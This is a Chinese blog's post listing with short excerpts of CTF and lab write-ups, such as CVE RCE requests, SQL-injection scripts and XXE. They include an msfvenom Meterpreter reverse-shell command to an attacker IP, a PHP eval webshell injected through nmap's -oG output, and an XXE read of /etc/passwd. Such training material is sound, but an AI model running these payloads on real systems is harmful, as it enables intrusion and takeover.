自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(122)
  • 收藏
  • 关注

原创 CSDN搬家到博客园

博客园地址https://www.cnblogs.com/mech/

2020-05-14 19:28:57 179

原创 Data Commons RCE(CVE-2018-1273)

打开是如下注册页面在注册时抓包并修改数据POST /users?page=&size=5 HTTP/1.1Host: 192.168.134.132:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,ap...

2021-07-20 10:36:00 63

原创 Supervisord RCE(CVE-2017-11610)

打开是这个页面直接发送如下数据包POST /RPC2 HTTP/1.1Host: 192.168.134.132:9001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,application/xhtml+xml,app...

2021-07-20 10:28:00 60

原创 kali2020误删gcc后重新安装--笔记

直接apt安装apt install gcc报错libc6-dev : 破坏: libgcc-9-dev (< 9.3.0-5~) 但是 9.2.1-22 正要被安装E: 错误,pkgProblemResolver::Resolve 发生故障,这可能是有软件包被要求保持现状的缘故。按照网上的方法,https://www.cnblogs.com/awakenedy/articles...

2021-06-03 23:06:00 74

原创 中文姓名转汉语拼音

利用python的pinyin库转import pinyinprint(pinyin.get('你好',format='strip')) #去掉声调fire1 = open('456.txt','r',encoding='utf-8')fire2 = open('姓名字典.txt','w',encoding='utf-8')for line in fire1.readlines()...

2021-03-05 19:44:00 37

原创 python 中文乱码解决办法

1.方法1 指定编码为utf-8response = requests.get(url=url)response.encoding= 'utf-8'page_text = response.text2.方法2 重新编码再解码img_name = img_name.encode('iso-8859-1').decode('gbk')...

2021-02-24 16:45:00 24

原创 win7 sp1 提权实验

靶机信息win7 sp164位先关闭win7上的防火墙利用msfvenom生成meterpreter反弹shellmsfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.182.128 lport=23333 -f exe X > shell.exe将shell.exe丢到目标机器上kali中启动msfus...

2021-02-22 15:58:00 23

原创 [网鼎杯2018]Unfinish

注册用了邮箱、账户名、密码,登录只用了邮箱和密码,登录进去后账户名显示出来了,推测存在二次注入过滤了逗号和information,无法使用information_schema,猜测flag在flag表中上脚本#coding:utf-8import requestsfrom bs4 import BeautifulSoupimport time url = 'http://2a3...

2021-02-06 10:31:00 19

原创 [强网杯 2019]高明的黑客

提示有源码泄露下载下来后,发现有3000多个文件,做了大量的混淆推测其中有能执行的php文件嫖一个一叶飘零大佬的脚本大致思想是找出$_GET[]里边的参数,然后去执行,类似于$_GET['a'] = echo "sky cool",如果回显中存在sky cool,则该shell能执行15个进程,花了一个钟头跑出结果import requestsfrom multiprocessi...

2021-02-04 22:23:00 22

原创 [强网杯 2019]Upload

初始页面如下注册一个账号登录可以上传文件,但是上传后的文件后缀都会改成png抓包发现cookie为base64解码为序列化数据a:5:{s:2:"ID";i:8;s:8:"username";s:7:"asdaszz";s:5:"email";s:8:"[email protected]";s:8:"password";s:32:"e10adc3949ba59abbe56e057f20f883e";s:3...

2021-02-04 10:01:00 30

原创 docker批量删除容器+删除后批量删除网桥

#列出容器id,去掉CONTAINER ID字符串docker ps -a | awk '{if($1!~/^CONT/) print $1}'#列出已开容器并删除docker ps -a | awk '{if($1!~/^CONT/) print $1}' | xargs docker rm # 批量删除镜像docker images | awk '{if($3!~/^IMAGE...

2021-01-25 22:31:00 21

原创 [b01lers2020]Welcome to Earth

一直自动跳转/die/页面,只能抓包看看到有个/chase/,进去看一下去/leftt/中看一眼后面就一路找,但是没找到什么有用的信息看了wp才知道,关键点在js文件中/static/js/door.js最后来到static/js/fight.js// Run to scramble original flag//console.log(scramble(flag, act...

2020-10-03 18:23:00 24

原创 [GYCTF2020]EasyThinking

thinkphp框架,先报错,查看版本thinkphp6.0版本,经查阅,存在任意文件写入先注册一个账户,登录时将cookie修改成aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php,一共32位在搜索处可写入webshell访问runtime/session/sess_aaaaaaaaaaaaaaaaaaaaaaaaaaaa.php可以看到disable_function...

2020-10-01 20:07:00 16

原创 [EIS 2019]EzPOP

题目源码<?phperror_reporting(0);class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { ...

2020-09-30 19:06:00 32

原创 [网鼎杯 2020 白虎组]PicDown

存在任意文件读取非预期读取flag预期解读取当前进程执行命令../../../../../proc/self/cmdlinelinux proc/pid/信息说明可以看到是使用python2执行了app.py文件,读取一下from flask import Flask, Responsefrom flask import render_templatefrom flask impo...

2020-09-28 20:12:00 17

原创 [NCTF2019]SQLi

regexp注入robots.txthint.txt可以看到过滤了很多东西,这里考虑regexp正则注入正常查看一下用户匹配成功会返回1匹配失败返回0测试一下返回结果,此处空字节%00用来注释select * from users where username='\' and passwd=''||1;%00相当于select * from users where user...

2020-09-26 20:31:00 16

原创 [SWPUCTF 2018]SimplePHP

phar反序列化pop链构造可以看到,有file参数,猜测可能存在任意文件读取依次读取index.php<?php header("content-type:text/html;charset=utf-8"); include 'base.php';?>base.php<!DOCTYPE html> <html> <head...

2020-09-21 18:44:00 17

原创 [BJDCTF2020]EzPHP

题目源码<?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red>...

2020-09-18 20:42:00 40

原创 [Zer0pts2020]Can you guess it?

源码<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read ...

2020-09-18 17:21:00 20

原创 [HITCON 2017]SSRFme

题目源码122.192.27.100 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea...

2020-09-16 19:18:00 21

原创 简单socket编程

socket就像一扇门,连接运输层(TCP)与进程流为字符串序列import java.io.*;import java.net.*;public class Client{ public static void main(String argv[]) throws Exception{ String sentence; String modifiedSentence; B...

2020-08-28 17:28:00 14

原创 识别struts2

来自https://github.com/coffeehb/struts2_check#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time : 2018/01/23 下午2:14# @Author : Komi# @File : struts2_hunt.py# @Project : POC-T# @Ver: :...

2020-08-19 17:12:00 35

原创 [BJDCTF 2nd]文件探测

知识点php://filterssrfsprintf格式化字符串漏洞session绕过初始界面抓包,header处发现提示,Hint:home.php访问home.php,跳转到了system.phpurl中带有file=system,有可能存在文件读取,尝试用伪协议php://filter读取home.php?file=php://filter/convert.base6...

2020-08-19 15:30:00 15

原创 [HarekazeCTF2019]encode_and_encode

知识点json字符转义伪协议绕过题目源码<?phperror_reporting(0);if (isset($_GET['source'])) { show_source(__FILE__); exit();}function is_valid($str) { $banword = [ // no path traversal '\.\....

2020-07-13 17:01:00 16

原创 [网鼎杯 2020 朱雀组]Nmap

和[BUUCTF 2018]Online Tool类似,直接用里面的payload' <?php @eval($_POST["hack"]);?> -oG hack.php '回显hacker,经查,php被过滤,使用短标签绕过' <?= @eval($_POST["hack"]);?> -oG hack.phtml '成功写入访问一下http:...

2020-05-29 18:34:00 14

原创 [NCTF2019]True XML cookbook

知识点XXE探测内网一如既往的登录框抓包,添加外部注入实体,读取/etc/passwd<?xml version="1.0" encoding="utf-8"?><!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]><user><userna...

2020-05-27 22:08:00 12

原创 [HFCTF2020]EasyLogin

知识点jwt登录界面随便注册一个账户登录一下看到有getflag,但是没有权限读取F12查看源码,在source里看到app.js没有什么思路,看了一下wp,得知要读取controllers/api.js拿到源码const crypto = require('crypto');const fs = require('fs')const jwt = require...

2020-05-27 21:25:00 22

原创 [WUSTCTF2020]朴实无华

访问robots.txt得到提示User-agent: *Disallow: /fAke_f1agggg.php访问fAke_f1agggg.php,得到flag{this_is_not_flag}查看header头发现/fl4g.php访问/fl4g.php得到源码<?phpheader('Content-type:text/html;charset=ut...

2020-05-27 20:06:00 12

原创 [MRCTF2020]Ezpop

知识点pop链反序列化构造题目源码Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%...

2020-05-27 19:08:00 14

原创 [网鼎杯 2020 朱雀组]phpweb

抓包看一下date是一个函数,后面的p应该是它的参数猜测使用了call_user_func(函数名,参数)函数读取源码func=file_get_contents&p=index.php<?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_...

2020-05-27 10:58:00 11

原创 Linux开启键盘灯脚本

#!/bin/bash#OnLight.shxset led named 'Scroll Lock'

2020-05-24 22:46:00 27

原创 GKCTF web

原理可能看不太明白,操作步骤尽量写详细一些CheckIN唯一做出来的,还是太菜了知识点LD_PRELOAD劫持so题目源码<title>Check_In</title><?php highlight_file(__FILE__);class ClassName{ public $code = null; pu...

2020-05-24 21:46:00 52

原创 [SUCTF 2019]EasyWeb

知识点无字母getshell题目给了源码<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exis...

2020-05-18 20:54:00 20

原创 [网鼎杯 2020 青龙组]filejava

知识点web.xml文件泄露blind xxe随便上传一个文件,然后点击下载,抓包看到有filename,猜测可能存在目录穿越以及任意文件下载尝试filename=../  看到有一个路径,里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取DownloadServlet?filename=../../../../../../....

2020-05-18 18:41:00 18

原创 [RoarCTF 2019]Online Proxy

知识点X-Forwarded-For注入二次注入盲注看了wp,知道注入点在X-Forwarded-For处,而且是个二次注入回显的地方在这里我们第一次输入1' or '1第二次和第三次都输入相同的数据,比如111由于第一次输入的1' or '1和第二次输入的111不一样,回显此时1' or '1已经存入数据库中,而且111与1' or '1不一样,所以服务器不...

2020-05-17 20:36:00 23

原创 [GYCTF2020]Ezsqli

布尔盲注无列名注入测试id=1 ==>Nu1Lid=2 ==>V&Nid=2-1 ==>Nu1L贴一下脚本# coding:utf-8 import requestsimport timeurl = 'http://14b858fa-e701-47da-a11a-304ef60eb42d.node3.buuoj.cn/'def str_h...

2020-05-17 11:54:00 15

原创 [BSidesCF 2020]Had a bad day

一开始没有思路,去翻了一下wp,知道可以用filter伪协议读源码尝试一下index.php?category=php://filter/convert.base64-encode/resource=index.php报错了,看到是index.php.php,应该是后台自动补上了.php,重新读一下index.php?category=php://filter/convert.b...

2020-05-16 19:18:00 12

原创 [CISCN2019 华北赛区 Day1 Web5]CyberPunk

知识点二次注入查看源码,在最下面找到提示看到file,联想到可以使用filter伪协议读取源码?file=php://filter/convert.base64-encode/resource=index.php?file=php://filter/convert.base64-encode/resource=delete.php?file=php://filter/c...

2020-05-16 18:42:00 14

原创 [CISCN2019 华东南赛区]Web11

知识点SSTIsmarty题目给了提示,BuildWithSmarty看到有X-Forwarded-For,抓包添加X-Forwarded-For: 127.0.0.1发现CurrentIP被修改成我们输入的值上SSTI图测试一下是否是smartyX-Forwarded-For: 7{*comment*}7正常返回77,说明确实是smarty,上sm...

2020-05-16 16:49:00 14

原创 [WUSTCTF2020]颜值成绩查询

知识点布尔盲注输入1成绩100输入2成绩666输入2-1成绩100判断为布尔型数字盲注贴一下脚本# -*- coding: utf-8 -*-#version:python3.8import requestsimport timeurl = "http://c63ca819-4d56-490f-b4ca-11c9a3e45706.node3.buuoj....

2020-05-16 16:36:00 13

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除